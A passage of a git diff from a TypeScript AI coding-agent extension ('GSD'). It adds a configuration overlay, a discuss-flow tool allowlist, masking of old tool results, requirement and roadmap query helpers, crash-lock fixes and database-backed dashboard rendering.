(postHooks.length > 0) hookRows.push({ label: "Post-unit", value: `${postHooks.length} active` }); + sections.push({ title: "Hooks", rows: hookRows }); + } + + // ─── Warnings ──────────────────────────────────────────────────────── + const warnings = [ + ...(globalPrefs?.warnings ?? []), + ...(projectPrefs?.warnings ?? 
[]), + ]; + if (warnings.length > 0) { + sections.push({ + title: "Warnings", + rows: warnings.map(w => ({ label: "\u26a0", value: w })), + }); + } + + return sections; +} + +// ─── Plain Text Formatter (headless/RPC fallback) ───────────────────────── + +export function formatConfigText(): string { + const sections = collectConfigSections(); + const lines: string[] = ["GSD Configuration\n"]; + + let maxLabel = 0; + for (const section of sections) { + for (const row of section.rows) { + if (row.label.length > maxLabel) maxLabel = row.label.length; + } + } + const pad = Math.min(maxLabel + 2, 24); + + for (const section of sections) { + lines.push(""); + lines.push(section.title.toUpperCase()); + for (const row of section.rows) { + lines.push(` ${row.label.padEnd(pad)}${row.value}`); + } + } + + return lines.join("\n"); +} + +// ─── Overlay Class ──────────────────────────────────────────────────────── + +export class GSDConfigOverlay { + private tui: { requestRender: () => void }; + private theme: Theme; + private onClose: () => void; + private sections: ConfigSection[]; + private cachedLines?: string[]; + private scrollOffset = 0; + private disposed = false; + + constructor( + tui: { requestRender: () => void }, + theme: Theme, + onClose: () => void, + ) { + this.tui = tui; + this.theme = theme; + this.onClose = onClose; + this.sections = collectConfigSections(); + } + + invalidate(): void { + this.cachedLines = undefined; + } + + dispose(): void { + this.disposed = true; + } + + handleInput(data: string): void { + if (matchesKey(data, Key.escape) || data === "q") { + this.dispose(); + this.onClose(); + return; + } + if (matchesKey(data, Key.down) || data === "j") { + this.scrollOffset++; + this.cachedLines = undefined; + this.tui.requestRender(); + return; + } + if (matchesKey(data, Key.up) || data === "k") { + this.scrollOffset = Math.max(0, this.scrollOffset - 1); + this.cachedLines = undefined; + this.tui.requestRender(); + return; + } + if (matchesKey(data, 
Key.pageDown)) { + this.scrollOffset += 10; + this.cachedLines = undefined; + this.tui.requestRender(); + return; + } + if (matchesKey(data, Key.pageUp)) { + this.scrollOffset = Math.max(0, this.scrollOffset - 10); + this.cachedLines = undefined; + this.tui.requestRender(); + return; + } + } + + render(width: number): string[] { + if (this.cachedLines) return this.cachedLines; + + const t = this.theme; + const w = Math.max(width, 50); + const allLines: string[] = []; + + // Header + allLines.push(t.bold(t.fg("accent", " GSD Configuration "))); + allLines.push(t.fg("muted", "\u2500".repeat(w))); + + // Find max label width for alignment + let maxLabel = 0; + for (const section of this.sections) { + for (const row of section.rows) { + if (row.label.length > maxLabel) maxLabel = row.label.length; + } + } + const labelPad = Math.min(maxLabel + 2, 24); + + for (const section of this.sections) { + allLines.push(""); + allLines.push(t.bold(t.fg("accent", ` ${section.title}`))); + + for (const row of section.rows) { + const label = t.fg("muted", ` ${row.label.padEnd(labelPad)}`); + const value = row.accent ? t.bold(row.value) : row.value; + allLines.push(truncateToWidth(`${label}${value}`, w)); + } + } + + allLines.push(""); + allLines.push(t.fg("muted", ` ${"\u2500".repeat(w - 4)}`)); + allLines.push(t.fg("muted", " esc/q close \u2502 \u2191\u2193/jk scroll \u2502 /gsd prefs to edit")); + + // Apply scroll + const maxScroll = Math.max(0, allLines.length - 20); + this.scrollOffset = Math.min(this.scrollOffset, maxScroll); + const visible = allLines.slice(this.scrollOffset); + + this.cachedLines = visible; + return visible; + } +} diff --git a/src/resources/extensions/gsd/constants.ts b/src/resources/extensions/gsd/constants.ts index 636f2d808..15812dc93 100644 --- a/src/resources/extensions/gsd/constants.ts +++ b/src/resources/extensions/gsd/constants.ts @@ -19,3 +19,47 @@ export const DIR_CACHE_MAX = 200; /** Max parse-cache entries before eviction. 
*/ export const CACHE_MAX = 50; + +// ─── Tool Scoping ───────────────────────────────────────────────────────────── + +/** + * GSD tools allowed during discuss flows (#2949). + * + * xAI/Grok (and potentially other providers with grammar-based constrained + * decoding) return "Grammar is too complex" (HTTP 400) when the combined + * tool schemas exceed their internal grammar limit. The full GSD tool set + * registers ~33 tools with deeply nested schemas; discuss flows only need + * a small subset. + * + * By scoping tools to this allowlist during discuss dispatches, the grammar + * sent to the provider stays well under provider limits. + * + * Included tools and why: + * - gsd_summary_save: writes CONTEXT.md artifacts (all discuss prompts) + * - gsd_save_summary: alias for above + * - gsd_decision_save: records decisions (discuss.md output phase) + * - gsd_save_decision: alias for above + * - gsd_plan_milestone: writes roadmap (discuss.md single/multi milestone) + * - gsd_milestone_plan: alias for above + * - gsd_milestone_generate_id: generates milestone IDs (discuss.md multi-milestone) + * - gsd_generate_milestone_id: alias for above + * - gsd_requirement_update: updates requirements during discuss + * - gsd_update_requirement: alias for above + */ +export const DISCUSS_TOOLS_ALLOWLIST: readonly string[] = [ + // Context / summary writing + "gsd_summary_save", + "gsd_save_summary", + // Decision recording + "gsd_decision_save", + "gsd_save_decision", + // Milestone planning (needed for discuss.md output phase) + "gsd_plan_milestone", + "gsd_milestone_plan", + // Milestone ID generation (multi-milestone flow) + "gsd_milestone_generate_id", + "gsd_generate_milestone_id", + // Requirement updates + "gsd_requirement_update", + "gsd_update_requirement", +]; diff --git a/src/resources/extensions/gsd/context-masker.ts b/src/resources/extensions/gsd/context-masker.ts new file mode 100644 index 000000000..824c3a91e --- /dev/null +++ 
b/src/resources/extensions/gsd/context-masker.ts @@ -0,0 +1,74 @@ +/** + * Observation masking for GSD auto-mode sessions. + * + * Replaces tool result content older than N turns with a placeholder. + * Reduces context bloat between compactions with zero LLM overhead. + * Preserves message ordering, roles, and all assistant/user messages. + * + * Operates on the pi-ai Message[] format (post-convertToLlm, pre-provider): + * - toolResult messages: { role: "toolResult", content: TextContent[] } + * - bash results are already converted to: { role: "user", content: [{type:"text",text:"..."}] } + * and start with "Ran `" from bashExecutionToText. + */ + +interface MaskableMessage { + role: string; + content: unknown; + type?: string; + [key: string]: unknown; +} + +const MASK_PLACEHOLDER = "[result masked — within summarized history]"; +const MASK_CONTENT_BLOCK = [{ type: "text" as const, text: MASK_PLACEHOLDER }]; + +function findTurnBoundary(messages: MaskableMessage[], keepRecentTurns: number): number { + let turnsSeen = 0; + for (let i = messages.length - 1; i >= 0; i--) { + const m = messages[i]; + // In the LLM payload, genuine user turns have role "user". + // Tool results have role "toolResult" and are excluded by this check. + if (m.role === "user") { + // Skip bash-result user messages (converted from bashExecution) — these aren't real user turns + if (isBashResultUserMessage(m)) continue; + turnsSeen++; + if (turnsSeen >= keepRecentTurns) return i; + } + } + return 0; +} + +/** + * Detect user messages that originated from bashExecution. + * After convertToLlm, these are {role: "user", content: [{type:"text", text:"Ran `cmd`\n..."}]}. + * The bashExecutionToText format always starts with "Ran `". 
+ */ +function isBashResultUserMessage(m: MaskableMessage): boolean { + if (m.role !== "user" || !Array.isArray(m.content)) return false; + const first = m.content[0]; + return first && typeof first === "object" && "text" in first && + typeof first.text === "string" && first.text.startsWith("Ran `"); +} + +function isMaskableMessage(m: MaskableMessage): boolean { + // Tool result messages (role: "toolResult" in pi-ai format) + if (m.role === "toolResult") return true; + // Bash-result user messages (converted from bashExecution by convertToLlm) + if (isBashResultUserMessage(m)) return true; + return false; +} + +export function createObservationMask(keepRecentTurns: number = 8) { + return (messages: MaskableMessage[]): MaskableMessage[] => { + const boundary = findTurnBoundary(messages, keepRecentTurns); + if (boundary === 0) return messages; + + return messages.map((m, i) => { + if (i >= boundary) return m; + if (isMaskableMessage(m)) { + // Content may be string or array of content blocks — always replace with array + return { ...m, content: MASK_CONTENT_BLOCK }; + } + return m; + }); + }; +} diff --git a/src/resources/extensions/gsd/context-store.ts b/src/resources/extensions/gsd/context-store.ts index b23f1e855..df938555a 100644 --- a/src/resources/extensions/gsd/context-store.ts +++ b/src/resources/extensions/gsd/context-store.ts @@ -15,6 +15,7 @@ export interface DecisionQueryOpts { } export interface RequirementQueryOpts { + milestoneId?: string; sliceId?: string; status?: string; } @@ -67,7 +68,8 @@ export function queryDecisions(opts?: DecisionQueryOpts): Decision[] { /** * Query active (non-superseded) requirements with optional filters. - * - sliceId: filters where primary_owner LIKE '%sliceId%' OR supporting_slices LIKE '%sliceId%' + * - milestoneId: combined with sliceId for precise filtering (e.g. 
%M005/S01%) + * - sliceId: filters where primary_owner LIKE '%pattern%' OR supporting_slices LIKE '%pattern%' * - status: filters where status = :status (exact match) * * Returns [] if DB is not available. Never throws. @@ -81,9 +83,19 @@ export function queryRequirements(opts?: RequirementQueryOpts): Requirement[] { const clauses: string[] = ['superseded_by IS NULL']; const params: Record = {}; - if (opts?.sliceId) { + // Combined milestone+slice filtering for precise scoping + if (opts?.milestoneId && opts?.sliceId) { + // Use combined pattern like %M005/S01% to avoid cross-milestone contamination + clauses.push('(primary_owner LIKE :combined_pattern OR supporting_slices LIKE :combined_pattern)'); + params[':combined_pattern'] = `%${opts.milestoneId}/${opts.sliceId}%`; + } else if (opts?.sliceId) { + // Slice-only filtering (legacy behavior) clauses.push('(primary_owner LIKE :slice_pattern OR supporting_slices LIKE :slice_pattern)'); params[':slice_pattern'] = `%${opts.sliceId}%`; + } else if (opts?.milestoneId) { + // Milestone-only filtering + clauses.push('(primary_owner LIKE :milestone_pattern OR supporting_slices LIKE :milestone_pattern)'); + params[':milestone_pattern'] = `%${opts.milestoneId}%`; } if (opts?.status) { @@ -194,3 +206,156 @@ export function queryArtifact(path: string): string | null { export function queryProject(): string | null { return queryArtifact('PROJECT.md'); } + +// ─── Knowledge Query ─────────────────────────────────────────────────────── + +/** + * Filter KNOWLEDGE.md sections by keyword matching. + * Uses H2 sections, matches keywords case-insensitively against: + * 1. Section header text + * 2. First paragraph of section content (up to first blank line or next heading) + * + * Per D020, returns empty string (not null) when no matches found. + * This signals "no relevant knowledge" vs "file not found". 
+ * + * @param content - Full KNOWLEDGE.md content + * @param keywords - Keywords to match (case-insensitive) + * @returns Concatenated matching sections with H2 headers, or empty string + */ +export async function queryKnowledge(content: string, keywords: string[]): Promise { + if (!content || keywords.length === 0) return ''; + + // Lazy import to avoid circular dependency + const { extractAllSections } = await import('./files.js'); + + const sections = extractAllSections(content, 2); + if (sections.size === 0) return ''; + + // Normalize keywords for case-insensitive matching + const normalizedKeywords = keywords.map(k => k.toLowerCase()); + + const matchingSections: string[] = []; + + for (const [header, body] of sections) { + // Extract first paragraph: everything up to first blank line or next heading + const firstParagraph = body.split(/\n\s*\n|\n#/)[0] || ''; + + // Check if any keyword matches header or first paragraph + const headerLower = header.toLowerCase(); + const paragraphLower = firstParagraph.toLowerCase(); + + const matches = normalizedKeywords.some(kw => + headerLower.includes(kw) || paragraphLower.includes(kw) + ); + + if (matches) { + matchingSections.push(`## ${header}\n\n${body}`); + } + } + + return matchingSections.join('\n\n'); +} + +// ─── Roadmap Excerpt Formatter ───────────────────────────────────────────── + +/** + * Format a minimal roadmap excerpt for prompt injection. + * Parses the slice table from roadmap content, extracts: + * 1. Header row + separator + * 2. Predecessor row (if sliceId depends on one via the Depends column) + * 3. Target slice row + * 4. Reference directive pointing to full roadmap path + * + * Per D021, this minimizes injected content while preserving dependency awareness. + * Returns empty string if sliceId is not found in the table. + * Never throws. + * + * @param roadmapContent - Full content of the M###-ROADMAP.md file + * @param sliceId - Target slice ID (e.g. 
'S02') + * @param roadmapPath - Optional path for reference directive (defaults to generic) + */ +export function formatRoadmapExcerpt( + roadmapContent: string, + sliceId: string, + roadmapPath = 'ROADMAP.md', +): string { + if (!roadmapContent || !sliceId) return ''; + + const lines = roadmapContent.split('\n'); + + // Find the slice table header: | ID | Slice | ... (case insensitive) + let headerIndex = -1; + for (let i = 0; i < lines.length; i++) { + const line = lines[i]; + if (line && /^\s*\|\s*ID\s*\|\s*Slice\s*\|/i.test(line)) { + headerIndex = i; + break; + } + } + + if (headerIndex === -1) return ''; + + // The separator should be the next line (|---|---|...) + const separatorIndex = headerIndex + 1; + if (separatorIndex >= lines.length) return ''; + + const headerLine = lines[headerIndex]; + const separatorLine = lines[separatorIndex]; + + // Validate separator line looks like |---|---|... (may include : for alignment) + if (!separatorLine || !/^\s*\|[\s:\-|]+\|/.test(separatorLine)) return ''; + + // Parse table rows after separator + interface SliceRow { + line: string; + id: string; + depends: string; + } + + const sliceRows: SliceRow[] = []; + for (let i = separatorIndex + 1; i < lines.length; i++) { + const line = lines[i]; + if (!line || !line.trim().startsWith('|')) break; // End of table + + // Parse row: | ID | Slice | Risk | Depends | Done | After this | + const cells = line.split('|').map(c => c.trim()); + // cells[0] is empty (before first |), cells[1] is ID, etc. + if (cells.length < 5) continue; + + const id = cells[1] || ''; + const depends = cells[4] || ''; // Depends column (0-indexed: empty, ID, Slice, Risk, Depends, ...) + + sliceRows.push({ line, id, depends }); + } + + // Find target slice row + const targetRow = sliceRows.find(r => r.id === sliceId); + if (!targetRow) return ''; + + // Find predecessor if target depends on one + // Depends column may contain: '—', 'S01', 'S01, S02', etc. 
+ let predecessorRow: SliceRow | undefined; + const dependsRaw = targetRow.depends; + if (dependsRaw && dependsRaw !== '—' && dependsRaw !== '-') { + // Extract first dependency (e.g. 'S01' from 'S01, S02') + const depMatch = dependsRaw.match(/S\d+/); + if (depMatch) { + predecessorRow = sliceRows.find(r => r.id === depMatch[0]); + } + } + + // Build excerpt + const excerptLines: string[] = [headerLine!, separatorLine!]; + + if (predecessorRow) { + excerptLines.push(predecessorRow.line); + } + + excerptLines.push(targetRow.line); + + // Add reference directive + excerptLines.push(''); + excerptLines.push(`> See full roadmap: ${roadmapPath}`); + + return excerptLines.join('\n'); +} diff --git a/src/resources/extensions/gsd/crash-recovery.ts b/src/resources/extensions/gsd/crash-recovery.ts index 8db786026..1b147fead 100644 --- a/src/resources/extensions/gsd/crash-recovery.ts +++ b/src/resources/extensions/gsd/crash-recovery.ts @@ -14,8 +14,7 @@ import { readFileSync, unlinkSync, existsSync } from "node:fs"; import { join } from "node:path"; import { gsdRoot } from "./paths.js"; import { atomicWriteSync } from "./atomic-write.js"; - -const LOCK_FILE = "auto.lock"; +import { effectiveLockFile } from "./session-lock.js"; export interface LockData { pid: number; @@ -23,13 +22,12 @@ export interface LockData { unitType: string; unitId: string; unitStartedAt: string; - completedUnits: number; /** Path to the pi session JSONL file that was active when this unit started. */ sessionFile?: string; } function lockPath(basePath: string): string { - return join(gsdRoot(basePath), LOCK_FILE); + return join(gsdRoot(basePath), effectiveLockFile()); } /** Write or update the lock file with current auto-mode state. 
*/ @@ -37,7 +35,6 @@ export function writeLock( basePath: string, unitType: string, unitId: string, - completedUnits: number, sessionFile?: string, ): void { try { @@ -47,7 +44,6 @@ export function writeLock( unitType, unitId, unitStartedAt: new Date().toISOString(), - completedUnits, sessionFile, }; const lp = lockPath(basePath); @@ -79,12 +75,16 @@ export function readCrashLock(basePath: string): LockData | null { /** * Check whether the process that wrote the lock is still running. * Uses `process.kill(pid, 0)` which sends no signal but checks liveness. - * Returns false if the PID matches our own (recycled PID from a prior run). + * Returns true if the PID matches our own — we are the lock holder (#2470). */ export function isLockProcessAlive(lock: LockData): boolean { const pid = lock.pid; if (!Number.isInteger(pid) || pid <= 0) return false; - if (pid === process.pid) return false; + // Our own PID means WE hold this lock — we are alive. (#2470) + // Callers that need to distinguish "our lock" from "someone else's lock" + // (e.g. startAuto checking for a prior crashed session with a recycled PID) + // already guard with `crashLock.pid !== process.pid` before calling us. + if (pid === process.pid) return true; try { process.kill(pid, 0); return true; @@ -102,12 +102,11 @@ export function formatCrashInfo(lock: LockData): string { `Previous auto-mode session was interrupted.`, ` Was executing: ${lock.unitType} (${lock.unitId})`, ` Started at: ${lock.unitStartedAt}`, - ` Units completed before crash: ${lock.completedUnits}`, ` PID: ${lock.pid}`, ]; // Add recovery guidance based on what was happening when it crashed - if (lock.unitType === "starting" && lock.unitId === "bootstrap" && lock.completedUnits === 0) { + if (lock.unitType === "starting" && lock.unitId === "bootstrap") { lines.push(`No work was lost. 
Run /gsd auto to restart.`); } else if (lock.unitType.includes("research") || lock.unitType.includes("plan")) { lines.push(`The ${lock.unitType} unit may be incomplete. Run /gsd auto to re-run it.`); diff --git a/src/resources/extensions/gsd/custom-execution-policy.ts b/src/resources/extensions/gsd/custom-execution-policy.ts index 6912c83f4..656873682 100644 --- a/src/resources/extensions/gsd/custom-execution-policy.ts +++ b/src/resources/extensions/gsd/custom-execution-policy.ts @@ -14,6 +14,7 @@ import type { ExecutionPolicy } from "./execution-policy.js"; import type { RecoveryAction, CloseoutResult } from "./engine-types.js"; import { runCustomVerification } from "./custom-verification.js"; +import { parseUnitId } from "./unit-id.js"; export class CustomExecutionPolicy implements ExecutionPolicy { private readonly runDir: string; @@ -48,8 +49,8 @@ export class CustomExecutionPolicy implements ExecutionPolicy { unitId: string, _context: { basePath: string }, ): Promise<"continue" | "retry" | "pause"> { - const parts = unitId.split("/"); - const stepId = parts[parts.length - 1]; + const { milestone, slice, task } = parseUnitId(unitId); + const stepId = task ?? slice ?? milestone; return runCustomVerification(this.runDir, stepId); } diff --git a/src/resources/extensions/gsd/custom-verification.ts b/src/resources/extensions/gsd/custom-verification.ts index 6c9a28b72..77d76d30e 100644 --- a/src/resources/extensions/gsd/custom-verification.ts +++ b/src/resources/extensions/gsd/custom-verification.ts @@ -17,11 +17,13 @@ * - The frozen DEFINITION.yaml on disk is the single source of truth for step policies. 
*/ +import { logWarning } from "./workflow-logger.js"; import { readFileSync, existsSync, statSync } from "node:fs"; import { join, resolve, sep } from "node:path"; import { spawnSync } from "node:child_process"; import type { StepDefinition, VerifyPolicy } from "./definition-loader.js"; import { readFrozenDefinition } from "./custom-workflow-engine.js"; +import { rewriteCommandWithRtk } from "../shared/rtk.js"; /** Verification outcome type — matches ExecutionPolicy.verify() return type. */ export type VerificationOutcome = "continue" | "retry" | "pause"; @@ -129,8 +131,8 @@ function handleContentHeuristic( if (!new RegExp(verify.pattern).test(content)) { return "pause"; } - } catch { - // Invalid regex at runtime — treat as verification failure + } catch (e) { + logWarning("engine", `content-heuristic regex failed: ${(e as Error).message}`); return "pause"; } } @@ -164,7 +166,8 @@ function handleShellCommand( return "pause"; } - const result = spawnSync("sh", ["-c", verify.command], { + const rewrittenCommand = rewriteCommandWithRtk(verify.command); + const result = spawnSync("sh", ["-c", rewrittenCommand], { cwd: runDir, timeout: 30_000, encoding: "utf-8", diff --git a/src/resources/extensions/gsd/custom-workflow-engine.ts b/src/resources/extensions/gsd/custom-workflow-engine.ts index 49e71a4bd..bcdbc8f4d 100644 --- a/src/resources/extensions/gsd/custom-workflow-engine.ts +++ b/src/resources/extensions/gsd/custom-workflow-engine.ts @@ -33,6 +33,7 @@ import { } from "./graph.js"; import { injectContext } from "./context-injector.js"; import type { WorkflowDefinition, StepDefinition } from "./definition-loader.js"; +import { parseUnitId } from "./unit-id.js"; /** Read and parse the frozen DEFINITION.yaml from a run directory. 
*/ export function readFrozenDefinition(runDir: string): WorkflowDefinition { @@ -178,11 +179,13 @@ export class CustomWorkflowEngine implements WorkflowEngine { state: EngineState, completedStep: CompletedStep, ): Promise { - const graph = state.raw as WorkflowGraph; + // Re-read the graph from disk so we do not overwrite concurrent + // workflow edits with a stale in-memory snapshot from deriveState(). + const graph = readGraph(this.runDir); // Extract stepId from "/" - const parts = completedStep.unitId.split("/"); - const stepId = parts[parts.length - 1]; + const { milestone, slice, task } = parseUnitId(completedStep.unitId); + const stepId = task ?? slice ?? milestone; const updatedGraph = markStepComplete(graph, stepId); writeGraph(this.runDir, updatedGraph); diff --git a/src/resources/extensions/gsd/dashboard-overlay.ts b/src/resources/extensions/gsd/dashboard-overlay.ts index a7945398c..37bd547fb 100644 --- a/src/resources/extensions/gsd/dashboard-overlay.ts +++ b/src/resources/extensions/gsd/dashboard-overlay.ts @@ -9,7 +9,8 @@ import type { Theme } from "@gsd/pi-coding-agent"; import { truncateToWidth, visibleWidth, matchesKey, Key } from "@gsd/pi-tui"; import { deriveState } from "./state.js"; -import { loadFile, parseRoadmap, parsePlan } from "./files.js"; +import { loadFile } from "./files.js"; +import { isDbAvailable, getMilestoneSlices, getSliceTasks } from "./gsd-db.js"; import { resolveMilestoneFile, resolveSliceFile } from "./paths.js"; import { getAutoDashboardData } from "./auto.js"; import type { AutoDashboardData } from "./auto-dashboard.js"; @@ -28,6 +29,8 @@ import { runEnvironmentChecks, type EnvironmentCheckResult } from "./doctor-envi function unitLabel(type: string): string { switch (type) { + case "discuss-milestone": + case "discuss-slice": return "Discuss"; case "research-milestone": return "Research"; case "plan-milestone": return "Plan"; case "research-slice": return "Research"; @@ -98,18 +101,11 @@ export class GSDDashboardOverlay 
{ const currentUnit = dashData.currentUnit ? `${dashData.currentUnit.type}:${dashData.currentUnit.id}:${dashData.currentUnit.startedAt}` : "-"; - const lastCompleted = dashData.completedUnits.length > 0 - ? dashData.completedUnits[dashData.completedUnits.length - 1] - : null; - const completedKey = lastCompleted - ? `${dashData.completedUnits.length}:${lastCompleted.type}:${lastCompleted.id}:${lastCompleted.finishedAt}` - : "0"; return [ base, dashData.active ? "1" : "0", dashData.paused ? "1" : "0", currentUnit, - completedKey, ].join("|"); } @@ -159,9 +155,14 @@ export class GSDDashboardOverlay { const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP"); const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null; - if (roadmapContent) { - const roadmap = parseRoadmap(roadmapContent); - for (const s of roadmap.slices) { + // Normalize slices from DB + type NormSlice = { id: string; done: boolean; title: string; risk: string }; + let normSlices: NormSlice[] = []; + if (isDbAvailable()) { + normSlices = getMilestoneSlices(mid).map(s => ({ id: s.id, done: s.status === "complete", title: s.title, risk: s.risk || "medium" })); + } + + for (const s of normSlices) { const sliceView: SliceView = { id: s.id, title: s.title, @@ -172,19 +173,18 @@ export class GSDDashboardOverlay { }; if (sliceView.active) { - const planFile = resolveSliceFile(base, mid, s.id, "PLAN"); - const planContent = planFile ? 
await loadFile(planFile) : null; - if (planContent) { - const plan = parsePlan(planContent); + // Normalize tasks from DB + if (isDbAvailable()) { + const dbTasks = getSliceTasks(mid, s.id); sliceView.taskProgress = { - done: plan.tasks.filter(t => t.done).length, - total: plan.tasks.length, + done: dbTasks.filter(t => t.status === "complete" || t.status === "done").length, + total: dbTasks.length, }; - for (const t of plan.tasks) { + for (const t of dbTasks) { sliceView.tasks.push({ id: t.id, title: t.title, - done: t.done, + done: t.status === "complete" || t.status === "done", active: state.activeTask?.id === t.id, }); } @@ -192,7 +192,6 @@ export class GSDDashboardOverlay { } view.slices.push(sliceView); - } } this.milestoneData = view; @@ -454,49 +453,6 @@ export class GSDDashboardOverlay { lines.push(centered(th.fg("dim", "No active milestone."))); } - if (this.dashData.completedUnits.length > 0) { - lines.push(blank()); - lines.push(hr()); - lines.push(row(th.fg("text", th.bold("Completed")))); - lines.push(blank()); - - // Build ledger lookup for budget indicators (last entry wins for retries) - const ledgerLookup = new Map(); - const currentLedger = getLedger(); - if (currentLedger) { - for (const lu of currentLedger.units) { - ledgerLookup.set(`${lu.type}:${lu.id}`, lu); - } - } - - const recent = [...this.dashData.completedUnits].reverse().slice(0, 10); - for (const u of recent) { - // Budget indicators from ledger — use warning glyph for pressured units - const ledgerEntry = ledgerLookup.get(`${u.type}:${u.id}`); - const hadPressure = ledgerEntry?.continueHereFired === true; - const hadTruncation = (ledgerEntry?.truncationSections ?? 0) > 0; - const unitGlyph = hadPressure - ? 
th.fg(STATUS_COLOR.warning, STATUS_GLYPH.warning) - : th.fg(STATUS_COLOR.done, STATUS_GLYPH.done); - const left = ` ${unitGlyph} ${th.fg("muted", unitLabel(u.type))} ${th.fg("muted", u.id)}`; - - let budgetMarkers = ""; - if (hadTruncation) { - budgetMarkers += th.fg("warning", ` ▼${ledgerEntry!.truncationSections}`); - } - if (hadPressure) { - budgetMarkers += th.fg("error", " → wrap-up"); - } - - const right = th.fg("dim", formatDuration(u.finishedAt - u.startedAt)); - lines.push(row(joinColumns(`${left}${budgetMarkers}`, right, contentWidth))); - } - - if (this.dashData.completedUnits.length > 10) { - lines.push(row(th.fg("dim", ` ...and ${this.dashData.completedUnits.length - 10} more`))); - } - } - const ledger = getLedger(); if (ledger && ledger.units.length > 0) { const totals = getProjectTotals(ledger.units); @@ -603,6 +559,13 @@ export class GSDDashboardOverlay { if (cacheRate > 0) { lines.push(row(`${th.fg("dim", "cache hit rate:")} ${th.fg("text", `${cacheRate}%`)}`)); } + + if (this.dashData.rtkEnabled && this.dashData.rtkSavings && this.dashData.rtkSavings.commands > 0) { + const rtk = this.dashData.rtkSavings; + lines.push(row( + `${th.fg("dim", "rtk saved:")} ${th.fg("text", formatTokenCount(rtk.savedTokens))} ${th.fg("dim", `(${Math.round(rtk.savingsPct)}% · ${rtk.commands} cmd${rtk.commands === 1 ? "" : "s"})`)}`, + )); + } } // Environment health section (#1221) — only show issues diff --git a/src/resources/extensions/gsd/db-writer.ts b/src/resources/extensions/gsd/db-writer.ts index 2559d5e04..14bcb75b5 100644 --- a/src/resources/extensions/gsd/db-writer.ts +++ b/src/resources/extensions/gsd/db-writer.ts @@ -9,14 +9,68 @@ // parseDecisionsTable() and parseRequirementsSections() with field fidelity. 
import { join, resolve } from 'node:path'; +import { readFileSync, existsSync, statSync } from 'node:fs'; import type { Decision, Requirement } from './types.js'; import { resolveGsdRootFile } from './paths.js'; import { saveFile } from './files.js'; import { GSDError, GSD_STALE_STATE, GSD_IO_ERROR } from './errors.js'; +import { logWarning, logError } from './workflow-logger.js'; import { invalidateStateCache } from './state.js'; import { clearPathCache } from './paths.js'; import { clearParseCache } from './files.js'; +// ─── Freeform Detection ─────────────────────────────────────────────────── + +/** + * Detect whether a DECISIONS.md file is in canonical table format + * (generated by generateDecisionsMd). + * + * Returns true only if the file starts with the canonical header + * ("# Decisions Register") that generateDecisionsMd produces. + * Files with freeform content — even if they contain an appended + * decisions table section — return false so the freeform content + * is preserved. + */ +export function isDecisionsTableFormat(content: string): boolean { + // The canonical format always starts with "# Decisions Register" + const firstLine = content.split('\n')[0]?.trim() ?? ''; + if (firstLine !== '# Decisions Register') return false; + + // Additionally verify the file has the canonical table header + return content.includes('| # | When | Scope | Decision | Choice | Rationale | Revisable?'); +} + +/** + * Generate a minimal decisions table section (header + rows) for appending + * to a freeform DECISIONS.md file. + */ +function generateDecisionsAppendBlock(decisions: Decision[]): string { + const lines: string[] = []; + lines.push(''); + lines.push('---'); + lines.push(''); + lines.push('## Decisions Table'); + lines.push(''); + lines.push('| # | When | Scope | Decision | Choice | Rationale | Revisable? 
| Made By |'); + lines.push('|---|------|-------|----------|--------|-----------|------------|---------|'); + + for (const d of decisions) { + const cells = [ + d.id, + d.when_context, + d.scope, + d.decision, + d.choice, + d.rationale, + d.revisable, + d.made_by ?? 'agent', + ].map(cell => (cell ?? '').replace(/\|/g, '\\|')); + lines.push(`| ${cells.join(' | ')} |`); + } + + return lines.join('\n') + '\n'; +} + // ─── Markdown Generators ────────────────────────────────────────────────── /** @@ -168,11 +222,148 @@ export async function nextDecisionId(): Promise { const next = maxNum + 1; return `D${String(next).padStart(3, '0')}`; } catch (err) { - process.stderr.write(`gsd-db: nextDecisionId failed: ${(err as Error).message}\n`); + logError('manifest', 'nextDecisionId failed', { fn: 'nextDecisionId', error: String((err as Error).message) }); return 'D001'; } } +// ─── Next Requirement ID ───────────────────────────────────────────────── + +/** + * Compute the next requirement ID from the current DB state. + * Queries MAX(CAST(SUBSTR(id, 2) AS INTEGER)) from requirements table. + * Returns R001 if no requirements exist. Zero-pads to 3 digits. + */ +export async function nextRequirementId(): Promise { + try { + const db = await import('./gsd-db.js'); + const adapter = db._getAdapter(); + if (!adapter) return 'R001'; + + const row = adapter + .prepare('SELECT MAX(CAST(SUBSTR(id, 2) AS INTEGER)) as max_num FROM requirements') + .get(); + + const maxNum = row ? 
(row['max_num'] as number | null) : null; + if (maxNum == null || isNaN(maxNum)) return 'R001'; + + const next = maxNum + 1; + return `R${String(next).padStart(3, '0')}`; + } catch (err) { + logError('manifest', 'nextRequirementId failed', { fn: 'nextRequirementId', error: String((err as Error).message) }); + return 'R001'; + } +} + +// ─── Save Requirement to DB + Regenerate Markdown ──────────────────────── + +export interface SaveRequirementFields { + class: string; + status?: string; + description: string; + why: string; + source: string; + primary_owner?: string; + supporting_slices?: string; + validation?: string; + notes?: string; +} + +/** + * Save a new requirement to DB and regenerate REQUIREMENTS.md. + * Auto-assigns the next ID via nextRequirementId(). + * + * The ID computation and insert are wrapped in a single transaction + * to prevent parallel race conditions (same pattern as saveDecisionToDb). + * + * Returns the assigned ID. + */ +export async function saveRequirementToDb( + fields: SaveRequirementFields, + basePath: string, +): Promise<{ id: string }> { + try { + const db = await import('./gsd-db.js'); + + // Atomic ID assignment + insert inside a transaction. + const id = db.transaction(() => { + const adapter = db._getAdapter(); + if (!adapter) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open"); + + const row = adapter + .prepare('SELECT MAX(CAST(SUBSTR(id, 2) AS INTEGER)) as max_num FROM requirements') + .get(); + const maxNum = row ? (row['max_num'] as number | null) : null; + const nextId = (maxNum == null || isNaN(maxNum)) + ? 'R001' + : `R${String(maxNum + 1).padStart(3, '0')}`; + + const requirement: Requirement = { + id: nextId, + class: fields.class, + status: fields.status ?? 'active', + description: fields.description, + why: fields.why, + source: fields.source, + primary_owner: fields.primary_owner ?? '', + supporting_slices: fields.supporting_slices ?? '', + validation: fields.validation ?? '', + notes: fields.notes ?? 
